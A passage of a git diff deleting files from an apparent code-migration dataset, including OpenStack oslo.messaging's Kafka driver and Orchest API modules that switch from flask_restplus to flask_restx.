Messaging API version (currently not used) - :type version: str - :param call_monitor_timeout: Maximum time the client will wait for the - call to complete before or receive a message heartbeat indicating - the remote side is still executing. - :type call_monitor_timeout: float - :param retry: an optional default kafka consumer retries configuration - None means to retry forever - 0 means no retry - N means N retries - :type retry: int - """ - self.pconn.notify_send(target_to_topic(target, - vhost=self.virtual_host), - ctxt, message, retry) - - def listen(self, target, batch_size, batch_timeout): - raise NotImplementedError( - 'The RPC implementation for Kafka is not implemented') - - def listen_for_notifications(self, targets_and_priorities, pool, - batch_size, batch_timeout): - """Listen to a specified list of targets on Kafka brokers - - :param targets_and_priorities: List of pairs (target, priority) - priority is not used for kafka driver - target.exchange_target.topic is used as - a kafka topic - :type targets_and_priorities: list - :param pool: consumer group of Kafka consumers - :type pool: string - """ - conn = ConsumerConnection(self.conf, self._url) - topics = set() - for target, priority in targets_and_priorities: - topics.add(target_to_topic(target, priority)) - - conn.declare_topic_consumer(topics, pool) - - listener = KafkaListener(conn) - return base.PollStyleListenerAdapter(listener, batch_size, - batch_timeout) diff --git a/v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.target.py b/v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.target.py deleted file mode 100644 index 1871be1..0000000 --- a/v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.target.py +++ /dev/null @@ -1,456 +0,0 @@ -# Copyright (C) 2015 Cisco Systems, Inc. -# -# Licensed under the Apache License, Version 2.0 (the "License"); you may -# not use this file except in compliance with the License. You may obtain -# a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT -# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the -# License for the specific language governing permissions and limitations -# under the License. - -import logging -import threading - -import confluent_kafka -from confluent_kafka import KafkaException -from oslo_serialization import jsonutils -from oslo_utils import eventletutils -from oslo_utils import importutils - -from oslo_messaging._drivers import base -from oslo_messaging._drivers import common as driver_common -from oslo_messaging._drivers.kafka_driver import kafka_options - -if eventletutils.EVENTLET_AVAILABLE: - tpool = importutils.try_import('eventlet.tpool') - -LOG = logging.getLogger(__name__) - - -def unpack_message(msg): - """Unpack context and msg.""" - context = {} - message = None - msg = jsonutils.loads(msg) - message = driver_common.deserialize_msg(msg) - context = message['_context'] - del message['_context'] - return context, message - - -def pack_message(ctxt, msg): - """Pack context into msg.""" - if isinstance(ctxt, dict): - context_d = ctxt - else: - context_d = ctxt.to_dict() - msg['_context'] = context_d - - msg = driver_common.serialize_msg(msg) - - return msg - - -def concat(sep, items): - return sep.join(filter(bool, items)) - - -def target_to_topic(target, priority=None, vhost=None): - """Convert target into topic string - - :param target: Message destination target - :type target: oslo_messaging.Target - :param priority: Notification priority - :type priority: string - :param priority: Notification vhost - :type priority: string - """ - return concat(".", [target.topic, priority, vhost]) - - -class ConsumerTimeout(KafkaException): - pass - - -class AssignedPartition(object): - """This class is used by the ConsumerConnection to track the - assigned partitions. - """ - def __init__(self, topic, partition): - super(AssignedPartition, self).__init__() - self.topic = topic - self.partition = partition - self.skey = '%s %d' % (self.topic, self.partition) - - def to_dict(self): - return {'topic': self.topic, 'partition': self.partition} - - -class Connection(object): - """This is the base class for consumer and producer connections for - transport attributes. - """ - - def __init__(self, conf, url): - - self.driver_conf = conf.oslo_messaging_kafka - self.security_protocol = self.driver_conf.security_protocol - self.sasl_mechanism = self.driver_conf.sasl_mechanism - self.ssl_cafile = self.driver_conf.ssl_cafile - self.url = url - self.virtual_host = url.virtual_host - self._parse_url() - - def _parse_url(self): - self.hostaddrs = [] - self.username = None - self.password = None - - for host in self.url.hosts: - # NOTE(ansmith): connections and failover are transparently - # managed by the client library. Credentials will be - # selectd from first host encountered in transport_url - if self.username is None: - self.username = host.username - self.password = host.password - else: - if self.username != host.username: - LOG.warning("Different transport usernames detected") - - if host.hostname: - self.hostaddrs.append("%s:%s" % (host.hostname, host.port)) - - def reset(self): - """Reset a connection so it can be used again.""" - pass - - -class ConsumerConnection(Connection): - """This is the class for kafka topic/assigned partition consumer - """ - def __init__(self, conf, url): - - super(ConsumerConnection, self).__init__(conf, url) - self.consumer = None - self.consumer_timeout = self.driver_conf.kafka_consumer_timeout - self.max_fetch_bytes = self.driver_conf.kafka_max_fetch_bytes - self.group_id = self.driver_conf.consumer_group - self.use_auto_commit = self.driver_conf.enable_auto_commit - self.max_poll_records = self.driver_conf.max_poll_records - self._consume_loop_stopped = False - self.assignment_dict = dict() - - def find_assignment(self, topic, partition): - """Find and return existing assignment based on topic and partition""" - skey = '%s %d' % (topic, partition) - return self.assignment_dict.get(skey) - - def on_assign(self, consumer, topic_partitions): - """Rebalance on_assign callback""" - assignment = [AssignedPartition(p.topic, p.partition) - for p in topic_partitions] - self.assignment_dict = {a.skey: a for a in assignment} - for t in topic_partitions: - LOG.debug("Topic %s assigned to partition %d", - t.topic, t.partition) - - def on_revoke(self, consumer, topic_partitions): - """Rebalance on_revoke callback""" - self.assignment_dict = dict() - for t in topic_partitions: - LOG.debug("Topic %s revoked from partition %d", - t.topic, t.partition) - - def _poll_messages(self, timeout): - """Consume messages, callbacks and return list of messages""" - msglist = self.consumer.consume(self.max_poll_records, - timeout) - - if ((len(self.assignment_dict) == 0) or (len(msglist) == 0)): - raise ConsumerTimeout() - - messages = [] - for message in msglist: - if message is None: - break - a = self.find_assignment(message.topic(), message.partition()) - if a is None: - LOG.warning(("Message for %s received on unassigned " - "partition %d"), - message.topic(), message.partition()) - else: - messages.append(message.value()) - - if not self.use_auto_commit: - self.consumer.commit(asynchronous=False) - - return messages - - def consume(self, timeout=None): - """Receive messages. - - :param timeout: poll timeout in seconds - """ - - def _raise_timeout(exc): - raise driver_common.Timeout(str(exc)) - - timer = driver_common.DecayingTimer(duration=timeout) - timer.start() - - poll_timeout = (self.consumer_timeout if timeout is None - else min(timeout, self.consumer_timeout)) - - while True: - if self._consume_loop_stopped: - return - try: - if eventletutils.is_monkey_patched('thread'): - return tpool.execute(self._poll_messages, poll_timeout) - return self._poll_messages(poll_timeout) - except ConsumerTimeout as exc: - poll_timeout = timer.check_return( - _raise_timeout, exc, maximum=self.consumer_timeout) - except Exception: - LOG.exception("Failed to consume messages") - return - - def stop_consuming(self): - self._consume_loop_stopped = True - - def close(self): - if self.consumer: - self.consumer.close() - self.consumer = None - - def declare_topic_consumer(self, topics, group=None): - conf = { - 'bootstrap.servers': ",".join(self.hostaddrs), - 'group.id': (group or self.group_id), - 'enable.auto.commit': self.use_auto_commit, - 'max.partition.fetch.bytes': self.max_fetch_bytes, - 'security.protocol': self.security_protocol, - 'sasl.mechanism': self.sasl_mechanism, - 'sasl.username': self.username, - 'sasl.password': self.password, - 'ssl.ca.location': self.ssl_cafile, - 'enable.partition.eof': False, - 'default.topic.config': {'auto.offset.reset': 'latest'} - } - LOG.debug("Subscribing to %s as %s", topics, (group or self.group_id)) - self.consumer = confluent_kafka.Consumer(conf) - self.consumer.subscribe(topics, - on_assign=self.on_assign, - on_revoke=self.on_revoke) - - -class ProducerConnection(Connection): - - def __init__(self, conf, url): - - super(ProducerConnection, self).__init__(conf, url) - self.batch_size = self.driver_conf.producer_batch_size - self.linger_ms = self.driver_conf.producer_batch_timeout * 1000 - self.producer = None - self.producer_lock = threading.Lock() - - def _produce_message(self, topic, message): - while True: - try: - self.producer.produce(topic, message) - except KafkaException as e: - LOG.error("Produce message failed: %s" % str(e)) - except BufferError: - LOG.debug("Produce message queue full, waiting for deliveries") - self.producer.poll(0.5) - continue - break - - self.producer.poll(0) - - def notify_send(self, topic, ctxt, msg, retry): - """Send messages to Kafka broker. - - :param topic: String of the topic - :param ctxt: context for the messages - :param msg: messages for publishing - :param retry: the number of retry - """ - retry = retry if retry >= 0 else None - message = pack_message(ctxt, msg) - message = jsonutils.dumps(message).encode('utf-8') - - try: - self._ensure_producer() - if eventletutils.is_monkey_patched('thread'): - return tpool.execute(self._produce_message, topic, message) - return self._produce_message(topic, message) - except Exception: - # NOTE(sileht): if something goes wrong close the producer - # connection - self._close_producer() - raise - - def close(self): - self._close_producer() - - def _close_producer(self): - with self.producer_lock: - if self.producer: - try: - self.producer.flush() - except KafkaException: - LOG.error("Flush error during producer close") - self.producer = None - - def _ensure_producer(self): - if self.producer: - return - with self.producer_lock: - if self.producer: - return - conf = { - 'bootstrap.servers': ",".join(self.hostaddrs), - 'linger.ms': self.linger_ms, - 'batch.num.messages': self.batch_size, - 'security.protocol': self.security_protocol, - 'sasl.mechanism': self.sasl_mechanism, - 'sasl.username': self.username, - 'sasl.password': self.password, - 'ssl.ca.location': self.ssl_cafile - } - self.producer = confluent_kafka.Producer(conf) - - -class OsloKafkaMessage(base.RpcIncomingMessage): - - def __init__(self, ctxt, message): - super(OsloKafkaMessage, self).__init__(ctxt, message) - - def requeue(self): - LOG.warning("requeue is not supported") - - def reply(self, reply=None, failure=None): - LOG.warning("reply is not supported") - - def heartbeat(self): - LOG.warning("heartbeat is not supported") - - -class KafkaListener(base.PollStyleListener): - - def __init__(self, conn): - super(KafkaListener, self).__init__() - self._stopped = threading.Event() - self.conn = conn - self.incoming_queue = [] - - # FIXME(sileht): We do a first poll to ensure we topics are created - # This is a workaround mainly for functional tests, in real life - # this is fine if topics are not created synchroneously - self.poll(5) - - @base.batch_poll_helper - def poll(self, timeout=None): - while not self._stopped.is_set(): - if self.incoming_queue: - return self.incoming_queue.pop(0) - try: - messages = self.conn.consume(timeout=timeout) or [] - for message in messages: - msg = OsloKafkaMessage(*unpack_message(message)) - self.incoming_queue.append(msg) - except driver_common.Timeout: - return None - - def stop(self): - self._stopped.set() - self.conn.stop_consuming() - - def cleanup(self): - self.conn.close() - - -class KafkaDriver(base.BaseDriver): - """Kafka Driver - - Note: Current implementation of this driver is experimental. - """ - - def __init__(self, conf, url, default_exchange=None, - allowed_remote_exmods=None): - conf = kafka_options.register_opts(conf, url) - super(KafkaDriver, self).__init__( - conf, url, default_exchange, allowed_remote_exmods) - - self.listeners = [] - self.virtual_host = url.virtual_host - self.pconn = ProducerConnection(conf, url) - - def cleanup(self): - self.pconn.close() - for c in self.listeners: - c.close() - self.listeners = [] - LOG.info("Kafka messaging driver shutdown") - - def send(self, target, ctxt, message, wait_for_reply=None, timeout=None, - call_monitor_timeout=None, retry=None): - raise NotImplementedError( - 'The RPC implementation for Kafka is not implemented') - - def send_notification(self, target, ctxt, message, version, retry=None): - """Send notification to Kafka brokers - - :param target: Message destination target - :type target: oslo_messaging.Target - :param ctxt: Message context - :type ctxt: dict - :param message: Message payload to pass - :type message: dict - :param version: Messaging API version (currently not used) - :type version: str - :param call_monitor_timeout: Maximum time the client will wait for the - call to complete before or receive a message heartbeat indicating - the remote side is still executing. - :type call_monitor_timeout: float - :param retry: an optional default kafka consumer retries configuration - None means to retry forever - 0 means no retry - N means N retries - :type retry: int - """ - self.pconn.notify_send(target_to_topic(target, - vhost=self.virtual_host), - ctxt, message, retry) - - def listen(self, target, batch_size, batch_timeout): - raise NotImplementedError( - 'The RPC implementation for Kafka is not implemented') - - def listen_for_notifications(self, targets_and_priorities, pool, - batch_size, batch_timeout): - """Listen to a specified list of targets on Kafka brokers - - :param targets_and_priorities: List of pairs (target, priority) - priority is not used for kafka driver - target.exchange_target.topic is used as - a kafka topic - :type targets_and_priorities: list - :param pool: consumer group of Kafka consumers - :type pool: string - """ - conn = ConsumerConnection(self.conf, self._url) - topics = [] - for target, priority in targets_and_priorities: - topics.append(target_to_topic(target, priority)) - - conn.declare_topic_consumer(topics, pool) - - listener = KafkaListener(conn) - return base.PollStyleListenerAdapter(listener, batch_size, - batch_timeout) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.diff deleted file mode 100644 index 13585c4..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.diff +++ /dev/null @@ -1,11 +0,0 @@ -diff --git a/services/orchest-api/app/app/apis/__init__.py b/services/orchest-api/app/app/apis/__init__.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/apis/__init__.py - +++ b/services/orchest-api/app/app/apis/__init__.py -@@ -1,5 +1,5 @@ - from flask import Blueprint --from flask_restplus import Api -+from flask_restx import Api - - from app.apis.namespace_environment_builds import api as ns_env_builds - from app.apis.namespace_environment_images import api as ns_env_images diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.source.py deleted file mode 100644 index 24af84a..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.source.py +++ /dev/null @@ -1,29 +0,0 @@ -from flask import Blueprint -from flask_restplus import Api - -from app.apis.namespace_environment_builds import api as ns_env_builds -from app.apis.namespace_environment_images import api as ns_env_images -from app.apis.namespace_experiments import api as ns_experiments -from app.apis.namespace_pipelines import api as ns_pipelines -from app.apis.namespace_projects import api as ns_projects -from app.apis.namespace_runs import api as ns_runs -from app.apis.namespace_sessions import api as ns_sessions -from app.apis.namespace_validations import api as ns_validations - -blueprint = Blueprint("api", __name__) - -api = Api( - blueprint, - title="Orchest API", - version="1.0", - description="Back-end API for Orchest", -) - -api.add_namespace(ns_env_builds) -api.add_namespace(ns_env_images) -api.add_namespace(ns_experiments) -api.add_namespace(ns_pipelines) -api.add_namespace(ns_projects) -api.add_namespace(ns_runs) -api.add_namespace(ns_sessions) -api.add_namespace(ns_validations) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.target.py deleted file mode 100644 index 921bcd3..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.target.py +++ /dev/null @@ -1,29 +0,0 @@ -from flask import Blueprint -from flask_restx import Api - -from app.apis.namespace_environment_builds import api as ns_env_builds -from app.apis.namespace_environment_images import api as ns_env_images -from app.apis.namespace_experiments import api as ns_experiments -from app.apis.namespace_pipelines import api as ns_pipelines -from app.apis.namespace_projects import api as ns_projects -from app.apis.namespace_runs import api as ns_runs -from app.apis.namespace_sessions import api as ns_sessions -from app.apis.namespace_validations import api as ns_validations - -blueprint = Blueprint("api", __name__) - -api = Api( - blueprint, - title="Orchest API", - version="1.0", - description="Back-end API for Orchest", -) - -api.add_namespace(ns_env_builds) -api.add_namespace(ns_env_images) -api.add_namespace(ns_experiments) -api.add_namespace(ns_pipelines) -api.add_namespace(ns_projects) -api.add_namespace(ns_runs) -api.add_namespace(ns_sessions) -api.add_namespace(ns_validations) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.diff deleted file mode 100644 index 5fc711f..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/services/orchest-api/app/app/apis/namespace_environment_builds.py b/services/orchest-api/app/app/apis/namespace_environment_builds.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/apis/namespace_environment_builds.py - +++ b/services/orchest-api/app/app/apis/namespace_environment_builds.py -@@ -3,7 +3,7 @@ from datetime import datetime - - from celery.contrib.abortable import AbortableAsyncResult - from flask import abort, current_app, request --from flask_restplus import Namespace, Resource -+from flask_restx import Namespace, Resource - from sqlalchemy import desc, func, or_ - - import app.models as models diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.source.py deleted file mode 100644 index 6eb9a7d..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.source.py +++ /dev/null @@ -1,342 +0,0 @@ -import uuid -from datetime import datetime - -from celery.contrib.abortable import AbortableAsyncResult -from flask import abort, current_app, request -from flask_restplus import Namespace, Resource -from sqlalchemy import desc, func, or_ - -import app.models as models -from app import schema -from app.celery_app import make_celery -from app.connections import db -from app.utils import register_schema, update_status_db - -api = Namespace("environment-builds", description="Managing environment builds") -api = register_schema(api) - - -def abort_environment_build(environment_build_uuid, is_running=False): - """Aborts an environment build. - - Aborts an environment build by setting its state to ABORTED and - sending a REVOKE and ABORT command to celery. - - Args: - is_running: - environment_build_uuid: uuid of the environment build to abort - - Returns: - - """ - filter_by = { - "build_uuid": environment_build_uuid, - } - status_update = {"status": "ABORTED"} - celery_app = make_celery(current_app) - - # make use of both constructs (revoke, abort) - # so we cover both a task that is pending and a task which is running - celery_app.control.revoke(environment_build_uuid, timeout=1.0) - if is_running: - res = AbortableAsyncResult(environment_build_uuid, app=celery_app) - # it is responsibility of the task to terminate by reading it's aborted status - res.abort() - - update_status_db( - status_update, - model=models.EnvironmentBuild, - filter_by=filter_by, - ) - - -@api.route("/") -class EnvironmentBuildList(Resource): - @api.doc("get_environment_builds") - @api.marshal_with(schema.environment_builds) - def get(self): - """Fetches all environment builds (past and present). - - The environment builds are either PENDING, STARTED, SUCCESS, FAILURE, ABORTED - - """ - environment_builds = models.EnvironmentBuild.query.all() - if not environment_builds: - environment_builds = [] - - return ( - {"environment_builds": [envb.as_dict() for envb in environment_builds]}, - 200, - ) - - @api.doc("start_environment_builds") - @api.expect(schema.environment_build_requests) - @api.marshal_with( - schema.environment_builds, code=201, description="Queued environment build" - ) - def post(self): - """Queues a list of environment builds. - - Only unique requests are considered, meaning that a request - containing duplicate environment_build_requests will produce an - environment build only for each unique - environment_build_request. Note that requesting an - environment_build for an environment (identified by - project_uuid, environment_uuid, project_path) will REVOKE/ABORT - any other active (queued or actually started) environment build - for that environment. This implies that only an environment - build can be active (queued or actually started) for a given - environment. - """ - - # keep only unique requests - post_data = request.get_json() - builds_requests = post_data["environment_build_requests"] - builds_requests = set( - [ - (req["project_uuid"], req["environment_uuid"], req["project_path"]) - for req in builds_requests - ] - ) - builds_requests = [ - { - "project_uuid": req[0], - "environment_uuid": req[1], - "project_path": req[2], - } - for req in builds_requests - ] - - defined_builds = [] - celery = make_celery(current_app) - # start a celery task for each unique environment build request - for build_request in builds_requests: - - # check if a build for this project/environment is PENDING/STARTED - builds = models.EnvironmentBuild.query.filter( - models.EnvironmentBuild.project_uuid == build_request["project_uuid"], - models.EnvironmentBuild.environment_uuid - == build_request["environment_uuid"], - models.EnvironmentBuild.project_path == build_request["project_path"], - or_( - models.EnvironmentBuild.status == "PENDING", - models.EnvironmentBuild.status == "STARTED", - ), - ).all() - - for build in builds: - abort_environment_build(build.build_uuid, build.status == "STARTED") - - # We specify the task id beforehand so that we can commit to - # the db before actually launching the task, since the task - # might make some calls to the orchest-api referring to - # itself (e.g. a status update), and thus expecting to find - # itself in the db. This way we avoid race conditions. - task_id = str(uuid.uuid4()) - - # TODO: verify if forget has the same effect of - # ignore_result=True because ignore_result cannot be used - # with abortable tasks - # https://stackoverflow.com/questions/9034091/how-to-check-task-status-in-celery - # task.forget() - - environment_build = { - "build_uuid": task_id, - "project_uuid": build_request["project_uuid"], - "environment_uuid": build_request["environment_uuid"], - "project_path": build_request["project_path"], - "requested_time": datetime.fromisoformat(datetime.utcnow().isoformat()), - "status": "PENDING", - } - defined_builds.append(environment_build) - db.session.add(models.EnvironmentBuild(**environment_build)) - db.session.commit() - - # could probably do without this... - celery_job_kwargs = { - "project_uuid": build_request["project_uuid"], - "environment_uuid": build_request["environment_uuid"], - "project_path": build_request["project_path"], - } - - celery.send_task( - "app.core.tasks.build_environment", - kwargs=celery_job_kwargs, - task_id=task_id, - ) - - return {"environment_builds": defined_builds} - - -@api.route( - "/", -) -@api.param("environment_build_uuid", "UUID of the EnvironmentBuild") -@api.response(404, "Environment build not found") -class EnvironmentBuild(Resource): - @api.doc("get_environment_build") - @api.marshal_with(schema.environment_build, code=200) - def get(self, environment_build_uuid): - """Fetch an environment build given its uuid.""" - env_build = models.EnvironmentBuild.query.get_or_404( - ident=environment_build_uuid, description="EnvironmentBuild not found" - ) - return env_build.as_dict() - - @api.doc("set_environment_build_status") - @api.expect(schema.status_update) - def put(self, environment_build_uuid): - """Set the status of a environment build.""" - status_update = request.get_json() - - filter_by = { - "build_uuid": environment_build_uuid, - } - update_status_db( - status_update, - model=models.EnvironmentBuild, - filter_by=filter_by, - ) - - return {"message": "Status was updated successfully"}, 200 - - @api.doc("delete_environment_build") - @api.response(200, "Environment build cancelled or stopped ") - def delete(self, environment_build_uuid): - """Stops an environment build given its UUID. - - However, it will not delete any corresponding database entries, - it will update the status of corresponding objects to ABORTED. - """ - # this first read is to make sure the build exist - environment_build = models.EnvironmentBuild.query.get_or_404( - environment_build_uuid, - description="EnvironmentBuildTask not found", - ) - - status = environment_build.status - - if status != "PENDING" and status != "STARTED": - return ( - { - "message": "Environment build has state %s, no revocation or abortion necessary or possible" - % status - }, - 200, - ) - - abort_environment_build(environment_build_uuid, status == "STARTED") - - return {"message": "Environment build was successfully ABORTED"}, 200 - - -@api.route( - "/most-recent/", -) -@api.param( - "project_uuid", - "UUID of the project for which environment builds should be collected", -) -class ProjectMostRecentBuildsList(Resource): - @api.doc("get_project_most_recent_environment_builds") - @api.marshal_with(schema.environment_builds, code=200) - def get(self, project_uuid): - """Get the most recent environment build for each environment of a project. - - Only environments for which builds have already been requested - are considered. Meaning that environments that are part of a - project but have never been built won't be part of results. - - """ - - # filter by project uuid - # use a window function to get the most recently requested build for each environment - # return - rank = ( - func.rank() - .over(partition_by="environment_uuid", order_by=desc("requested_time")) - .label("rank") - ) - query = db.session.query(models.EnvironmentBuild) - query = query.filter_by(project_uuid=project_uuid) - query = query.add_column(rank) - # note: this works because rank is of type Label and - # rank == 1 will evaluate to sqlalchemy.sql.elements.BinaryExpression since the equality - # operator is overloaded - query = query.from_self().filter(rank == 1) - query = query.with_entities(models.EnvironmentBuild) - env_builds = query.all() - - return {"environment_builds": [build.as_dict() for build in env_builds]} - - -@api.route("/most-recent//") -@api.param("project_uuid", "UUID of the project.") -@api.param("environment_uuid", "UUID of the environment.") -class ProjectEnvironmentMostRecentBuild(Resource): - @api.doc("get_most_recent_build_by_proj_env") - @api.marshal_with(schema.environment_build, code=200) - def get(self, project_uuid, environment_uuid): - """Get the most recent environment build for a project_uuid, environment_uuid pair. - Only environments for which builds have already been requested are considered. - """ - - recent = ( - db.session.query(models.EnvironmentBuild) - .filter_by(project_uuid=project_uuid, environment_uuid=environment_uuid) - .order_by(desc(models.EnvironmentBuild.requested_time)) - .first() - ) - if recent: - return recent.as_dict() - abort(404, "EnvironmentBuild not found") - - -def delete_project_environment_builds(project_uuid, environment_uuid): - """Delete environment builds for an environment. - - Environment builds that are in progress are stopped. - - Args: - project_uuid: - environment_uuid: - """ - # order by request time so that the first build might - # be related to a PENDING or STARTED build, all others - # are surely not PENDING or STARTED - env_builds = ( - models.EnvironmentBuild.query.filter_by( - project_uuid=project_uuid, environment_uuid=environment_uuid - ) - .order_by(desc(models.EnvironmentBuild.requested_time)) - .all() - ) - - if len(env_builds) > 0 and env_builds[0].status in ["PENDING", "STARTED"]: - abort_environment_build(env_builds[0].build_uuid, True) - - for build in env_builds: - db.session.delete(build) - db.session.commit() - - -def delete_project_builds(project_uuid): - """Delete up all environment builds for a project. - - Environment builds that are in progress are stopped. - - Args: - project_uuid: - """ - builds = ( - models.EnvironmentBuild.query.filter_by(project_uuid=project_uuid) - .with_entities( - models.EnvironmentBuild.project_uuid, - models.EnvironmentBuild.environment_uuid, - ) - .distinct() - .all() - ) - - for build in builds: - delete_project_environment_builds(build.project_uuid, build.environment_uuid) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.target.py deleted file mode 100644 index a89637e..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.target.py +++ /dev/null @@ -1,342 +0,0 @@ -import uuid -from datetime import datetime - -from celery.contrib.abortable import AbortableAsyncResult -from flask import abort, current_app, request -from flask_restx import Namespace, Resource -from sqlalchemy import desc, func, or_ - -import app.models as models -from app import schema -from app.celery_app import make_celery -from app.connections import db -from app.utils import register_schema, update_status_db - -api = Namespace("environment-builds", description="Managing environment builds") -api = register_schema(api) - - -def abort_environment_build(environment_build_uuid, is_running=False): - """Aborts an environment build. - - Aborts an environment build by setting its state to ABORTED and - sending a REVOKE and ABORT command to celery. - - Args: - is_running: - environment_build_uuid: uuid of the environment build to abort - - Returns: - - """ - filter_by = { - "build_uuid": environment_build_uuid, - } - status_update = {"status": "ABORTED"} - celery_app = make_celery(current_app) - - # make use of both constructs (revoke, abort) - # so we cover both a task that is pending and a task which is running - celery_app.control.revoke(environment_build_uuid, timeout=1.0) - if is_running: - res = AbortableAsyncResult(environment_build_uuid, app=celery_app) - # it is responsibility of the task to terminate by reading it's aborted status - res.abort() - - update_status_db( - status_update, - model=models.EnvironmentBuild, - filter_by=filter_by, - ) - - -@api.route("/") -class EnvironmentBuildList(Resource): - @api.doc("get_environment_builds") - @api.marshal_with(schema.environment_builds) - def get(self): - """Fetches all environment builds (past and present). - - The environment builds are either PENDING, STARTED, SUCCESS, FAILURE, ABORTED - - """ - environment_builds = models.EnvironmentBuild.query.all() - if not environment_builds: - environment_builds = [] - - return ( - {"environment_builds": [envb.as_dict() for envb in environment_builds]}, - 200, - ) - - @api.doc("start_environment_builds") - @api.expect(schema.environment_build_requests) - @api.marshal_with( - schema.environment_builds, code=201, description="Queued environment build" - ) - def post(self): - """Queues a list of environment builds. - - Only unique requests are considered, meaning that a request - containing duplicate environment_build_requests will produce an - environment build only for each unique - environment_build_request. Note that requesting an - environment_build for an environment (identified by - project_uuid, environment_uuid, project_path) will REVOKE/ABORT - any other active (queued or actually started) environment build - for that environment. This implies that only an environment - build can be active (queued or actually started) for a given - environment. - """ - - # keep only unique requests - post_data = request.get_json() - builds_requests = post_data["environment_build_requests"] - builds_requests = set( - [ - (req["project_uuid"], req["environment_uuid"], req["project_path"]) - for req in builds_requests - ] - ) - builds_requests = [ - { - "project_uuid": req[0], - "environment_uuid": req[1], - "project_path": req[2], - } - for req in builds_requests - ] - - defined_builds = [] - celery = make_celery(current_app) - # start a celery task for each unique environment build request - for build_request in builds_requests: - - # check if a build for this project/environment is PENDING/STARTED - builds = models.EnvironmentBuild.query.filter( - models.EnvironmentBuild.project_uuid == build_request["project_uuid"], - models.EnvironmentBuild.environment_uuid - == build_request["environment_uuid"], - models.EnvironmentBuild.project_path == build_request["project_path"], - or_( - models.EnvironmentBuild.status == "PENDING", - models.EnvironmentBuild.status == "STARTED", - ), - ).all() - - for build in builds: - abort_environment_build(build.build_uuid, build.status == "STARTED") - - # We specify the task id beforehand so that we can commit to - # the db before actually launching the task, since the task - # might make some calls to the orchest-api referring to - # itself (e.g. a status update), and thus expecting to find - # itself in the db. This way we avoid race conditions. - task_id = str(uuid.uuid4()) - - # TODO: verify if forget has the same effect of - # ignore_result=True because ignore_result cannot be used - # with abortable tasks - # https://stackoverflow.com/questions/9034091/how-to-check-task-status-in-celery - # task.forget() - - environment_build = { - "build_uuid": task_id, - "project_uuid": build_request["project_uuid"], - "environment_uuid": build_request["environment_uuid"], - "project_path": build_request["project_path"], - "requested_time": datetime.fromisoformat(datetime.utcnow().isoformat()), - "status": "PENDING", - } - defined_builds.append(environment_build) - db.session.add(models.EnvironmentBuild(**environment_build)) - db.session.commit() - - # could probably do without this... - celery_job_kwargs = { - "project_uuid": build_request["project_uuid"], - "environment_uuid": build_request["environment_uuid"], - "project_path": build_request["project_path"], - } - - celery.send_task( - "app.core.tasks.build_environment", - kwargs=celery_job_kwargs, - task_id=task_id, - ) - - return {"environment_builds": defined_builds} - - -@api.route( - "/", -) -@api.param("environment_build_uuid", "UUID of the EnvironmentBuild") -@api.response(404, "Environment build not found") -class EnvironmentBuild(Resource): - @api.doc("get_environment_build") - @api.marshal_with(schema.environment_build, code=200) - def get(self, environment_build_uuid): - """Fetch an environment build given its uuid.""" - env_build = models.EnvironmentBuild.query.get_or_404( - ident=environment_build_uuid, description="EnvironmentBuild not found" - ) - return env_build.as_dict() - - @api.doc("set_environment_build_status") - @api.expect(schema.status_update) - def put(self, environment_build_uuid): - """Set the status of a environment build.""" - status_update = request.get_json() - - filter_by = { - "build_uuid": environment_build_uuid, - } - update_status_db( - status_update, - model=models.EnvironmentBuild, - filter_by=filter_by, - ) - - return {"message": "Status was updated successfully"}, 200 - - @api.doc("delete_environment_build") - @api.response(200, "Environment build cancelled or stopped ") - def delete(self, environment_build_uuid): - """Stops an environment build given its UUID. - - However, it will not delete any corresponding database entries, - it will update the status of corresponding objects to ABORTED. - """ - # this first read is to make sure the build exist - environment_build = models.EnvironmentBuild.query.get_or_404( - environment_build_uuid, - description="EnvironmentBuildTask not found", - ) - - status = environment_build.status - - if status != "PENDING" and status != "STARTED": - return ( - { - "message": "Environment build has state %s, no revocation or abortion 